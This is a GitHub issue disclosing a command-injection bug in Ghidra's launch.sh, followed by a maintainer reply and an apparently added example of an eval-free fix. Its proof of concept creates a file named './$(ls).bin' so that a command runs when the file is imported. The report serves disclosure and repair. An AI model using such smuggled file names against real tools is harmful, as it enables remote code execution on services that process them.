
Command injection in launch.sh #4869

Closed
attilaszia opened this issue Jan 4, 2023 · 1 comment · Fixed by #4872

Comments

@attilaszia

Describe the bug
/Ghidra/RuntimeScripts/Linux/support/launch.sh passes user provided input into eval. This results in straightforward command injection.

There are a couple of security SaaS's that use analyzeHeadless as part of a service, so this is a pretty surprising RCE on natural-looking invocations.

https://github.com/NationalSecurityAgency/ghidra/blob/master/Ghidra/RuntimeScripts/Linux/support/launch.sh#L192

```bash
if [ "${BACKGROUND}" = true ]; then
	eval "\"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]}" &>/dev/null &
	
	# If our process dies immediately, output something so the user knows to run in debug mode.
	# Otherwise they'll never see any error output from background mode.
	# Doing a kill -0 sends a no-op signal, which can be used to see if the process is still alive.
	PID=$!
	sleep 1
	if ! kill -0 ${PID} &>/dev/null; then
		echo "Exited with error.  Run in foreground (fg) mode for more details."
		exit 1
	fi
	exit 0
else
	eval "(set -o noglob; \"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]})"
	exit $?
fi
```

To Reproduce

```python
import subprocess

with open('/bin/bash', 'rb') as f:
    data = f.read()

with open('./$(ls).bin', 'wb') as g:
    g.write(data)

command = ['analyzeHeadless', './', 'poc', '-import', './$(ls).bin']
subprocess.call(command, shell=False)
```
@ryanmkurtz
Collaborator

I think eval was introduced to handle spaces in the VMARGS variable. I'm currently exploring alternative implementations that don't use eval, but suggestions are welcome for that VMARGS/spaces issue.
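The following is an added example, not code from Ghidra's launch.sh, from the reporter, or from the linked fix #4872. It shows the launch step rewritten without eval: the space-separated VMARG_LIST is split into a bash array once with `read -ra`, and every list is then expanded as `"${array[@]}"`, so each element reaches the child as exactly one argv entry and nothing user-supplied is re-parsed by the shell. The vulnerable eval form is kept beside it so the difference is visible. `fake_java`, `argc_java`, the constructed `VMARG_LIST` value and the benign `$(echo EXPANDED)` marker are stand-ins so the script runs offline under bash.

```bash
#!/usr/bin/env bash
# Added example, not Ghidra's launch.sh: the same launch step written without eval.
# fake_java / argc_java stand in for the real Java binary so this runs offline;
# VMARG_LIST is a constructed value standing in for what launch.sh reads from
# its properties file.

# Stand-in for "java": prints one argv element per line, so we can see exactly
# what the child process received.
fake_java() { printf '%s\n' "$@"; }

# Second stand-in: prints only the number of argv elements received.
argc_java() { echo "$#"; }

JAVA_CMD="${JAVA_CMD:-fake_java}"
VMARG_LIST="-Xmx2G -Dfoo=bar"   # constructed: two VM options separated by a space

# Vulnerable pattern, as in the report: the command line is rebuilt as one string
# and handed to eval, so the shell re-parses every user-supplied argument.
# A file name such as ./$(...).bin therefore has its command substitution run.
launch_with_eval() {
    local ARGS=("$@")
    eval "\"${JAVA_CMD}\" ${VMARG_LIST} ghidra.Ghidra ${ARGS[@]}"
}

# Hardened pattern: split VMARG_LIST on whitespace into an array once (read -ra),
# then expand each list as "${array[@]}". Every element becomes exactly one argv
# entry; nothing is re-parsed, so no command substitution, globbing or word
# splitting happens on user input, and 'set -o noglob' is no longer needed.
launch_without_eval() {
    local -a VMARGS ARGS
    read -r -a VMARGS <<< "${VMARG_LIST}"
    ARGS=("$@")
    "${JAVA_CMD}" "${VMARGS[@]}" ghidra.Ghidra "${ARGS[@]}"
}

# Demo with a benign marker: under eval the file name becomes ./EXPANDED.bin,
# without eval the child sees the literal text '$(echo EXPANDED)'.
echo "--- with eval ---";    launch_with_eval    -import './$(echo EXPANDED).bin'
echo "--- without eval ---"; launch_without_eval -import './$(echo EXPANDED).bin'
```

Two caveats on this approach. `read -ra` splits on whitespace in `$IFS` and does not honour quotes, so a single VM option that itself contains a space still cannot be expressed in a space-joined VMARG_LIST; the robust form is to hold the VM options in a bash array from the start, one element per option, and never join them into a string. And the array expansion must stay double-quoted (`"${VMARGS[@]}"`, `"${ARGS[@]}"`): an unquoted `${ARGS[@]}` outside eval would no longer run command substitutions, but would still word-split and glob user-supplied file names.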

@ryanmkurtz ryanmkurtz linked a pull request Jan 5, 2023 that will close this issue
@ryanmkurtz ryanmkurtz added Status: Internal This is being tracked internally by the Ghidra team and removed Status: Triage Information is being gathered labels Jan 6, 2023
@ryanmkurtz ryanmkurtz added this to the 10.2.3 milestone Jan 10, 2023